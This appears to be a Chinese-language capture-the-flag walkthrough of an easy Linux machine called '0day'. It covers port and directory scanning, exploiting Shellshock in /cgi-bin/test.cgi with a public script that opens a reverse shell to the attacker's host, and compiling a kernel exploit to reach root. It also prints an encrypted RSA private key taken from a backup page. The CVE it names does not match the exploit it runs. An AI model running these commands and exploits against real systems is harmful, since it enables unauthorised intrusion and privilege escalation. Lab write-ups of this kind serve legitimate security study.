0day
Machine:Linux
Level:easy
信息收集
nmap
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A 10.10.23.50
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 04:28 EDT
Nmap scan report for 10.10.23.50
Host is up (0.28s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
| 2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
| 256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_ 256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: 0day
|_http-server-header: Apache/2.4.7 (Ubuntu)
Aggressive OS guesses: Linux 3.10 - 3.13 (96%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Sony Android TV (Android 5.0) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 296.75 ms 10.11.0.1
2 286.80 ms 10.10.23.50
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.11 secondsgobuster
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.23.50/ -w /home/kali/Pentest_dict/directoryDicts/fileName10000.txt
===============================================================
/robots.txt (Status: 200) [Size: 38]
/.htpasswd (Status: 403) [Size: 287]
/.htaccess (Status: 403) [Size: 287]
/.htpasswds (Status: 403) [Size: 288]
Progress: 10288 / 10289 (99.99%)
===============================================================
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.23.50/ -w /home/kali/Pentest_dict/directoryDicts/top7000.txt
===============================================================
//admin (Status: 301) [Size: 309] [--> http://10.10.23.50/admin/]
//admin/ (Status: 200) [Size: 0]
//robots.txt (Status: 200) [Size: 38]
//index.html (Status: 200) [Size: 3025]
//backup (Status: 301) [Size: 310] [--> http://10.10.23.50/backup/]
//uploads (Status: 301) [Size: 311] [--> http://10.10.23.50/uploads/]
//admin/index.html (Status: 200) [Size: 0]
//cgi-bin/ (Status: 403) [Size: 286]
//backup/ (Status: 200) [Size: 1767]
//cgi-bin (Status: 301) [Size: 311] [--> http://10.10.23.50/cgi-bin/]
//css (Status: 301) [Size: 307] [--> http://10.10.23.50/css/]
//img/ (Status: 200) [Size: 933]
//secret (Status: 301) [Size: 310] [--> http://10.10.23.50/secret/]
//server-status (Status: 403) [Size: 291]
Progress: 6076 / 6984 (87.00%)[ERROR] 2023/07/27 04:34:09 [!] parse "http://10.10.23.50//database/%": invalid URL escape "%"
//img (Status: 301) [Size: 307] [--> http://10.10.23.50/img/]
//secret/ (Status: 200) [Size: 109]
//uploads/ (Status: 200) [Size: 0]
Progress: 6982 / 6984 (99.97%)
===============================================================手工验证信息
80
/robots.txt
访问显示You really thought it'd be this easy?
/buckup
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY----- /secret
Turtles?
nikto
┌──(root㉿kali)-[~]
└─# nikto --host http://10.10.23.50
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.23.50
+ Target Hostname: 10.10.23.50
+ Target Port: 80
+ Start Time: 2023-07-27 05:29:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https:/
+ /: The X-Content-Type-Options header is not set. This could allow the user asing-content-type-header/
+ /: Server may leak inodes via ETags, header found with file /, inode: bd1, s
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apa
+ /cgi-bin/test.cgi: Uncommon header '93e4r0-cve-2014-6278' found, with conten
+ /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .漏洞利用
发现了可能存在CVE-2003-1418,在exploitdb中搜索到https://www.exploit-db.com/exploits/34766,使用这个脚本进行getshell
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python2 34900.py payload=reverse rhost=10.10.23.50 lhost=10.11.42.10 lport=1234 pages=/cgi-bin/test.cgi
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/test.cgi
[!] Successfully exploited
[!] Incoming connection from 10.10.23.50
10.10.23.50> whoami
www-data
10.10.23.50> python -c 'import pty;pty.spawn("/bin/bash")'
10.10.23.50>export TERM=xterm-256-color权限提升
查看内核
10.10.23.50> uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux在exploitdb中查询此内核发现https://www.exploit-db.com/exploits/37292,我们在本机开启python服务并传输该文件,由于是www-data因此我们在/tmp/目录下下载,
www-data@ubuntu:/tmp$
10.10.148.119>
gcc 37292.c
gcc: error trying to exec 'cc1': execvp: No such file or directory这个错误表示 gcc 编译器无法执行程序 cc1,并且提示找不到该文件或目录。实际上,cc1 是 GCC 编译器的内部组件之一,用于将 C 语言源代码转换为中间代码。由于系统中缺少 cc1 文件或相关组件,导致编译器无法继续编译过程,从而产生了该错误。猜测是系统的环境变量未配置,确保 gcc 可执行文件所在的路径在环境变量 PATH 中。
www-data@ubuntu:/tmp$
10.10.148.119> export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin# 这段代码是一个用于设置环境变量 PATH 的命令,它将路径 /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 导出为系统的环境变量。
www-data@ubuntu:/tmp$
10.10.148.119> gcc 37292.c -o exploit
<t PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@ubuntu:/tmp$
10.10.148.119>
gcc 37292.c -o exploit
10.10.148.119> ls -l
www-data@ubuntu:/tmp$
10.10.148.119>
ls -l
total 24
-rw-r--r-- 1 www-data www-data 5119 Jul 27 03:07 37292.c
-rwxr-xr-x 1 www-data www-data 13652 Jul 27 17:49 exploit我们执行exploit文件,已经提权至root
10.10.148.119> ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
#
10.10.148.119> whoami
whoami
root